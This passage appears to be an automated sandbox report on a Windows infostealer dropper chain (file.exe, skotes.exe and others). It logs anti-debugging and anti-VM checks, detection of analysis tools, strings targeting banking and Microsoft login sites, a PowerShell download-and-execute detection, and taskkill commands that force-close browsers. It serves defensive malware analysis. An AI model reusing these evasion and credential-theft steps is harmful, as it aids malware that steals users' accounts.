                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeLast function: Thread delayed
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeLast function: Thread delayed
                          Source: C:\Users\user\AppData\Local\Temp\1012279001\e6d73861f4.exeLast function: Thread delayed
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C98C930 GetSystemInfo,VirtualAlloc,GetSystemInfo,VirtualFree,VirtualAlloc,0_2_6C98C930
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread delayed: delay time: 30000Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread delayed: delay time: 30000Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                          Source: file.exe, file.exe, 00000000.00000002.2728347677.0000000000E6C000.00000040.00000001.01000000.00000003.sdmp, EBFBFBFIIJ.exe, 00000015.00000002.2786447467.00000000010C3000.00000040.00000001.01000000.0000000B.sdmp, EBFBFBFIIJ.exe, 00000015.00000000.2709233788.00000000010C3000.00000080.00000001.01000000.0000000B.sdmp, skotes.exe, 00000016.00000002.3422222581.0000000000A73000.00000040.00000001.01000000.0000000D.sdmp, skotes.exe, 00000016.00000000.2764513854.0000000000A73000.00000080.00000001.01000000.0000000D.sdmp, rhnew.exe, 00000019.00000002.2972003227.0000000000F18000.00000040.00000001.01000000.0000000E.sdmp, e6d73861f4.exe, 0000001A.00000002.3420356768.00000000009A3000.00000040.00000001.01000000.0000000F.sdmp, fc1511c233.exe, 0000001B.00000002.3421076285.0000000001072000.00000040.00000001.01000000.00000010.sdmp, 6ae2430bb1.exe, 0000001C.00000002.3260069357.0000000000C7C000.00000040.00000001.01000000.00000011.sdmp, fc1511c233.exe, 00000020.00000002.3320776369.0000000001072000.00000040.00000001.01000000.00000010.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                          Source: fc1511c233.exe, 0000001B.00000003.3276521999.0000000005C45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                          Source: skotes.exe, 00000016.00000002.3432522788.0000000001077000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWgG2
                          Source: file.exe, 00000000.00000002.2729388458.00000000015A7000.00000004.00000020.00020000.00000000.sdmp, e6d73861f4.exe, 0000001A.00000002.3429327881.0000000000EFA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW8
                          Source: fc1511c233.exe, 0000001B.00000003.3276521999.0000000005C45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                          Source: fc1511c233.exe, 0000001B.00000003.3276521999.0000000005C45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
                          Source: fc1511c233.exe, 0000001B.00000003.3276521999.0000000005C45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696487552f
                          Source: fc1511c233.exe, 0000001B.00000003.3276521999.0000000005C45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696487552x
                          Source: fc1511c233.exe, 0000001B.00000003.3276521999.0000000005C45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
                          Source: file.exe, 00000000.00000002.2729388458.00000000015D4000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000016.00000002.3432522788.0000000001095000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000016.00000002.3432522788.0000000001051000.00000004.00000020.00020000.00000000.sdmp, rhnew.exe, 00000019.00000002.2972914286.000000000132F000.00000004.00000020.00020000.00000000.sdmp, rhnew.exe, 00000019.00000002.2972741556.00000000012DE000.00000004.00000020.00020000.00000000.sdmp, rhnew.exe, 00000019.00000003.2971218158.000000000132F000.00000004.00000020.00020000.00000000.sdmp, rhnew.exe, 00000019.00000003.2971598863.000000000132F000.00000004.00000020.00020000.00000000.sdmp, e6d73861f4.exe, 0000001A.00000002.3439588929.00000000055E6000.00000004.00000020.00020000.00000000.sdmp, fc1511c233.exe, 0000001B.00000002.3428013900.0000000001441000.00000004.00000020.00020000.00000000.sdmp, fc1511c233.exe, 0000001B.00000002.3428013900.00000000013EE000.00000004.00000020.00020000.00000000.sdmp, 6ae2430bb1.exe, 0000001C.00000002.3262194656.0000000001455000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                          Source: fc1511c233.exe, 0000001B.00000003.3276521999.0000000005C45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696487552
                          Source: firefox.exe, 0000002F.00000002.3443090623.000001F93E1C7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW : 2 : 34 : 1 : 1 : 0x20026 : 0x8 : %SystemRoot%\system32\mswsock.dll : : 1234191b-4bf7-4ca7-86e0-dfd7c32b5445
                          Source: fc1511c233.exe, 0000001B.00000003.3276521999.0000000005C45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                          Source: fc1511c233.exe, 0000001B.00000003.3276521999.0000000005C45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                          Source: fc1511c233.exe, 0000001B.00000003.3275205487.0000000005B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696487552p
                          Source: fc1511c233.exe, 0000001B.00000003.3276521999.0000000005C45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696487552
                          Source: fc1511c233.exe, 0000001B.00000003.3276521999.0000000005C45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696487552o
                          Source: firefox.exe, 0000002F.00000002.3439700563.000001F9341A4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RA
                          Source: firefox.exe, 0000002F.00000002.3439700563.000001F934160000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`
                          Source: fc1511c233.exe, 0000001B.00000003.3276521999.0000000005C45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696487552
                          Source: fc1511c233.exe, 0000001B.00000003.3276521999.0000000005C45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
                          Source: fc1511c233.exe, 0000001B.00000003.3276521999.0000000005C45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696487552
                          Source: fc1511c233.exe, 0000001B.00000003.3276521999.0000000005C45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696487552j
                          Source: fc1511c233.exe, 0000001B.00000003.3276521999.0000000005C45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
                          Source: fc1511c233.exe, 0000001B.00000003.3276521999.0000000005C45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                          Source: file.exe, 00000000.00000002.2727922118.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2156119488.0000000005320000.00000004.00001000.00020000.00000000.sdmp, 6ae2430bb1.exe, 0000001C.00000002.3259318138.00000000008B1000.00000040.00000001.01000000.00000011.sdmp, 6ae2430bb1.exe, 0000001C.00000003.3200675680.0000000005280000.00000004.00001000.00020000.00000000.sdmp, 6ae2430bb1.exe, 00000030.00000003.3348999903.0000000004BB0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: iMSHN6QKQEMUh;=a
                          Source: file.exe, 00000000.00000002.2729388458.000000000155E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware&
                          Source: file.exe, 00000000.00000002.2727922118.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2156119488.0000000005320000.00000004.00001000.00020000.00000000.sdmp, 6ae2430bb1.exe, 0000001C.00000002.3259318138.00000000008B1000.00000040.00000001.01000000.00000011.sdmp, 6ae2430bb1.exe, 0000001C.00000003.3200675680.0000000005280000.00000004.00001000.00020000.00000000.sdmp, 6ae2430bb1.exe, 00000030.00000003.3348999903.0000000004BB0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: MSHN6QKQEMU
                          Source: fc1511c233.exe, 0000001B.00000003.3276521999.0000000005C45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
                          Source: fc1511c233.exe, 0000001B.00000003.3276521999.0000000005C45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                          Source: fc1511c233.exe, 0000001B.00000003.3276521999.0000000005C45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                          Source: fc1511c233.exe, 0000001B.00000003.3276521999.0000000005C45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                          Source: fc1511c233.exe, 0000001B.00000003.3276521999.0000000005C45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696487552t
                          Source: fc1511c233.exe, 0000001B.00000003.3276521999.0000000005C45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                          Source: 6ae2430bb1.exe, 0000001C.00000002.3262194656.000000000140E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                          Source: fc1511c233.exe, 0000001B.00000003.3276521999.0000000005C45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                          Source: fc1511c233.exe, 0000001B.00000003.3276521999.0000000005C45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                          Source: fc1511c233.exe, 0000001B.00000003.3276521999.0000000005C45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696487552s
                          Source: fc1511c233.exe, 0000001B.00000003.3276521999.0000000005C45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                          Source: fc1511c233.exe, 0000001B.00000003.3276521999.0000000005C45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696487552t
                          Source: fc1511c233.exe, 0000001B.00000003.3276521999.0000000005C45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
                          Source: 1b3b76c439.exe, 00000021.00000003.3391908795.00000000008C3000.00000004.00000020.00020000.00000000.sdmp, 1b3b76c439.exe, 00000021.00000003.3391498439.00000000008C0000.00000004.00000020.00020000.00000000.sdmp, 1b3b76c439.exe, 00000021.00000003.3393067363.00000000008FC000.00000004.00000020.00020000.00000000.sdmp, 1b3b76c439.exe, 00000021.00000003.3392141199.00000000008E9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWYGMo
                          Source: file.exe, 00000000.00000002.2728347677.0000000000E6C000.00000040.00000001.01000000.00000003.sdmp, EBFBFBFIIJ.exe, 00000015.00000002.2786447467.00000000010C3000.00000040.00000001.01000000.0000000B.sdmp, skotes.exe, 00000016.00000002.3422222581.0000000000A73000.00000040.00000001.01000000.0000000D.sdmp, rhnew.exe, 00000019.00000002.2972003227.0000000000F18000.00000040.00000001.01000000.0000000E.sdmp, e6d73861f4.exe, 0000001A.00000002.3420356768.00000000009A3000.00000040.00000001.01000000.0000000F.sdmp, fc1511c233.exe, 0000001B.00000002.3421076285.0000000001072000.00000040.00000001.01000000.00000010.sdmp, 6ae2430bb1.exe, 0000001C.00000002.3260069357.0000000000C7C000.00000040.00000001.01000000.00000011.sdmp, fc1511c233.exe, 00000020.00000002.3320776369.0000000001072000.00000040.00000001.01000000.00000010.sdmp, skotes.exe, 00000022.00000002.3352655182.0000000000A73000.00000040.00000001.01000000.0000000D.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                          Source: fc1511c233.exe, 0000001B.00000003.3276521999.0000000005C45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
                          Source: fc1511c233.exe, 0000001B.00000003.3276521999.0000000005C45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                          Source: EBFBFBFIIJ.exe, 00000015.00000000.2709233788.00000000010C3000.00000080.00000001.01000000.0000000B.sdmp, skotes.exe, 00000016.00000000.2764513854.0000000000A73000.00000080.00000001.01000000.0000000D.sdmp, skotes.exe, 00000022.00000000.3284485521.0000000000A73000.00000080.00000001.01000000.0000000D.sdmpBinary or memory string: \\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                          Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                          Anti Debugging

                          barindex
                          Hides threads from debuggers
                          Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeThread information set: HideFromDebuggerJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebuggerJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1012278001\rhnew.exeThread information set: HideFromDebugger
                          Source: C:\Users\user\AppData\Local\Temp\1012279001\e6d73861f4.exeThread information set: HideFromDebugger
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeThread information set: HideFromDebugger
                          Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exeThread information set: HideFromDebugger
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeThread information set: HideFromDebugger
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebugger
                          Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exeThread information set: HideFromDebugger
                          Tries to detect sandboxes and other dynamic analysis tools (window names)
                          Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exeOpen window title or class name: regmonclass
                          Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exeOpen window title or class name: gbdyllo
                          Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                          Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exeOpen window title or class name: procmon_window_class
                          Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                          Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exeOpen window title or class name: ollydbg
                          Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exeOpen window title or class name: filemonclass
                          Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                          Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exeFile opened: NTICE
                          Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exeFile opened: SICE
                          Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exeFile opened: SIWVID
                          Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1012278001\rhnew.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1012278001\rhnew.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1012278001\rhnew.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1012279001\e6d73861f4.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1012279001\e6d73861f4.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1012279001\e6d73861f4.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exeProcess queried: DebugPort
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeCode function: 21_2_056B027E rdtsc 21_2_056B027E
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9D5FF0 IsDebuggerPresent,??0PrintfTarget@mozilla@@IAE@XZ,?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z,OutputDebugStringA,__acrt_iob_func,_fileno,_dup,_fdopen,__stdio_common_vfprintf,fclose,0_2_6C9D5FF0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C973480 ?ComputeProcessUptime@TimeStamp@mozilla@@CA_KXZ,GetCurrentProcess,GetProcessTimes,LoadLibraryW,GetProcAddress,__Init_thread_footer,__aulldiv,FreeLibrary,GetSystemTimeAsFileTime,0_2_6C973480
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeCode function: 21_2_00F0652B mov eax, dword ptr fs:[00000030h]21_2_00F0652B
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeCode function: 21_2_00F0A302 mov eax, dword ptr fs:[00000030h]21_2_00F0A302
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 22_2_008BA302 mov eax, dword ptr fs:[00000030h]22_2_008BA302
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 22_2_008B652B mov eax, dword ptr fs:[00000030h]22_2_008B652B
                          Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: Debug
                          Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: Debug
                          Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: Debug
                          Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: Debug
                          Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: Debug
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9AB66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_6C9AB66C
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9AB1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6C9AB1F7
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CB5AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6CB5AC62
                          Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                          HIPS / PFW / Operating System Protection Evasion

                          barindex
                          Yara detected Powershell download and execute
                          Source: Yara matchFile source: Process Memory Space: file.exe PID: 7276, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: 6ae2430bb1.exe PID: 5396, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: 6ae2430bb1.exe PID: 6464, type: MEMORYSTR
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\Documents\EBFBFBFIIJ.exe"Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\Documents\EBFBFBFIIJ.exe "C:\Users\user\Documents\EBFBFBFIIJ.exe" Jump to behavior
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1012278001\rhnew.exe "C:\Users\user\AppData\Local\Temp\1012278001\rhnew.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1012279001\e6d73861f4.exe "C:\Users\user\AppData\Local\Temp\1012279001\e6d73861f4.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe "C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exe "C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exe "C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /TJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CBA4760 malloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetLengthSid,GetLengthSid,GetLengthSid,malloc,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,PR_SetError,GetLastError,free,GetLastError,GetLastError,free,free,free,0_2_6CBA4760
                          Source: 1b3b76c439.exe, 00000021.00000000.3265874051.0000000000D62000.00000002.00000001.01000000.00000012.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                          Source: e6d73861f4.exe, 0000001A.00000002.3420356768.00000000009A3000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: Program Manager
                          Source: rhnew.exe, 00000019.00000002.2972003227.0000000000F18000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: 4Program Manager
                          Source: file.exe, 00000000.00000002.2728347677.0000000000E6C000.00000040.00000001.01000000.00000003.sdmp, 6ae2430bb1.exe, 0000001C.00000002.3260069357.0000000000C7C000.00000040.00000001.01000000.00000011.sdmpBinary or memory string: M_Program Manager
                          Source: firefox.exe, 0000002F.00000002.3427532099.000000E10ABFB000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: ?ProgmanListenerWi
                          Source: EBFBFBFIIJ.exe, EBFBFBFIIJ.exe, 00000015.00000002.2786845874.0000000001106000.00000040.00000001.01000000.0000000B.sdmp, skotes.exe, skotes.exe, 00000016.00000002.3427201443.0000000000AB6000.00000040.00000001.01000000.0000000D.sdmp, skotes.exe, 00000022.00000002.3357465758.0000000000AB6000.00000040.00000001.01000000.0000000D.sdmpBinary or memory string: R1Program Manager
                          Source: file.exeBinary or memory string: RM_Program Manager
                          Source: fc1511c233.exe, 0000001B.00000002.3421076285.0000000001072000.00000040.00000001.01000000.00000010.sdmp, fc1511c233.exe, 00000020.00000002.3320776369.0000000001072000.00000040.00000001.01000000.00000010.sdmpBinary or memory string: +-WProgram Manager
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9AB341 cpuid 0_2_6C9AB341
                          Source: C:\Users\user\Desktop\file.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
